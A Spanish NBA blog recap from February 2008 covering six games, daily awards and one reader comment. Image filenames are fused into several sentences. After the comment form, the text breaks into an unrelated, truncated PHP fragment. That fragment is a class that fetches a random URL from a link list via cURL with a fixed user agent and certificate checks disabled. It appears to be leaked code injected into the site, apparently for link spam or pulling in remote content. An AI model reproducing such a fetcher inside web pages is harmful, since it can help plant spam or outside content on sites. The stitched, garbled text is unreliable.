La crónica (12/02/08)

13 de February de 2008 por telekoman

La novena victoria consecutiva de los Pistons y la resistencia de los Celtics al frente de la Conferencia Este son sólo algunos de los detalles que dejó la madrugada del martes al miércoles. Los tienes todos en nuestra crónica de la jornada, pero antes, el vídeo con el resumen de los seis partidos disputados anoche:

La crónica:

rajonrondopacerslayupEn el partido que abría la jornada, los Pistons derrotaron a los Hawks por 94-90 con más apuros de los que a priori se esperaban. El equipo de Atlanta, liderado por Josh Smith con 30 puntos, compensó durante el tercer cuarto los 7 puntos de renta conseguidos por el equipo de Detroit en el primero para situarse 2 puntos por delante. La buena actuación de Billups en el final, con 10 puntos consecutivos, permitió a los Pistons ganar el partido. El base de Detroit consiguió 16 puntos y 8 asistencias mientras que Rasheed Wallace alcanzó los 21 puntos. El rebote fue claramente dominado por Atlanta con un Al Horford que consiguió 16 rebotes a los que añadió 12 puntos.

Tras la victoria de Detroit, Boston respondió de manera adecuada para continuar con la carrera para conseguir el primer puesto en el Este derrotando a Indiana por 104-97. Los Celtics no están teniendo grandes problemas pese a la baja de Garnett gracias a las buenas actuaciones de Pierce y Allen: en esta ocasión 28 y 23 puntos respectivamente, a los que Pierce añadió 12 rebotes y 5 asistencias. En los Pacers, que salieron muy enchufados en el primer cuarto, 6 jugadores anotaron por encima de 10 puntos, con un destacado Granger con 18 puntos, 10 rebotes y 5 tapones, pero no fue suficiente para parar el rodillo verde que alcanza ya la cifra de 40 victorias.

Partido a priori asequible para los Nets que se enfrentaban a los Timberwolves y que se resolvió por sólo 4 puntos, 88-92, a favor de New Jersey tras la remontada de Minnessota en el último cuarto. Es la tercera victoria consecutiva para el equipo del Este que le sitúa en el 7º puesto de la clasificación. El partido contó con varios protagonistas: Kidd, rozando de nuevo el triple doble con 9 puntos, 9 asistencias y 10shawnmariondunksheatnuggets rebotes; Carter, con 17 puntos, 4 rebotes y 10 asistencias; Jefferson, con 13 puntos y 12 rebotes o Nachbar, que saliendo desde el banquillo anotó 14 puntos en los 14 minutos de los que disfrutó. Por Minnessota el mejor fue Telfair con 24 puntos, mientras que Al Jefferson se quedó en 16 puntos y 11 rebotes, poco si tenemos en cuenta que el juego interior de los Nets no es ninguna maravilla.

Se empieza a notar la aportación de Shawn Marion en unos Heat que pusieron en muchos aprietos a los Nuggets, ante los que perdieron por un único punto, 114-113, tras forzar una prórroga. Marion consiguió 23 puntos y 18 rebotes en su segundo partido con los Heat demostrando que el trade por O’Neal puede resultar muy bueno para los de Florida. Por los Nuggets destacaron J.R. Smith, con 28 puntos, Kenyon Martin con 24 y Carmelo Anthony con 22 puntos y 11 rebotes. Cabe resaltar también a Iverson, con 16 puntos en una serie de tiro horripilante de 5 de 20. En los Heat, aparte de Marion, Wade fue el mejor hombre con 29 puntos y 10 byronscottcp3asistencias, Dorell Wright con 19, y Blount con 18 y 13 rebotes.

La sorpresa de la jornada la protagonizó Memphis al derrotar a Sacramento por 94-107 en lo que es la primera victoria tras 4 derrotas en la era post-Gasol. El protagonista no fue Rudy Gay, teórico líder de los Grizzlies, sino Hakim Warrick que anotó 24 puntos y capturó 13 rebotes en la posición de Gasol. Junto a él Gay anotó 21 puntos y Navarro, como 6º hombre, 19 en una buena actuación. La alineación de Memphis, con Gay de 3 y Warrick de 4 parece más equilibrada aunque lleve a Navarro fuera del quinteto.

Los abucheos a Tyson Chandler no impidieron la victoria de los Hornets en Chicago, aunque al líder de la división SouthWest le costó tomar el mando. Tras verse 7 bajo al descanso, New Orleans reaccionó con un parcial de 57-36 en la segunda mitad, con lo que acabó imponiéndose con claridad, 100-86. Andrés Nocioni fue el máximo anotador del partido con 28 puntos, pero se vio muy solo pese a la reaparición de Hinrich, que salió desde el banquillo. En los Hornets, West y Stojakovic lograron 27 puntos, Paul se fue a los 25 con 14 asistencias, y Chandler aportó su solidez bajo lo aros con 16 rebotes y 3 tapones.

Los premios del día son los siguientes:mcdyessjosh

Nuestro MVP: Demasiada gente se merece hoy el galardón. Josh Smith, Paul Pierce, Shawn Marion, Kevin Martin, Dwyane Wade, David West, Chris Paul, Peja Stojakovic… Todos han hecho grandes partidos pero ninguno ha sobresalido por encima del resto.

El rookie: Hoy no hay discusión. Ha sido fundamental en la victoria de Memphis con sus 19 puntos y 6 rebotes y tienen toda la pinta de ser el sexto hombre del equipo hasta final de temporada. ¿Por qué eres tan bueno, Navarro?

La sorpresa: Hoy nos quedamos con 2 nombres. El primero, el del jugador de Boston Leon Powe, que jugando como titular ha acabado con 16 puntos y 9 rebotes. El efecto de los 3 magníficos parece que contagia a su equipo. El otro nombre destacado es el de Hakim Warrick, que con la ausencia de Gasol aumentará seguramente sus registros. Hoy, 24 puntos y 13 rebotes para él. Tampoco podemos olvidar los 8 triples de JR Smith, aunque todos sabemos que, en racha, es capaz de estas cosas.

La decepción: Horrorosos los partidos realizados por RIP Hamilton y Tayshaun Prince, para acabar con 4 de 22 en tiros y 18 puntos entre los 2. Lo increible es que, aun así, los Pistons han ganado en Atlanta.

Os dejamos con las 10 mejores jugadas de la pasada madrugada:

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Teleko hay que mojarse en dar los premios, y aunque este disputado yo se lo daria a Paul Pierce.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>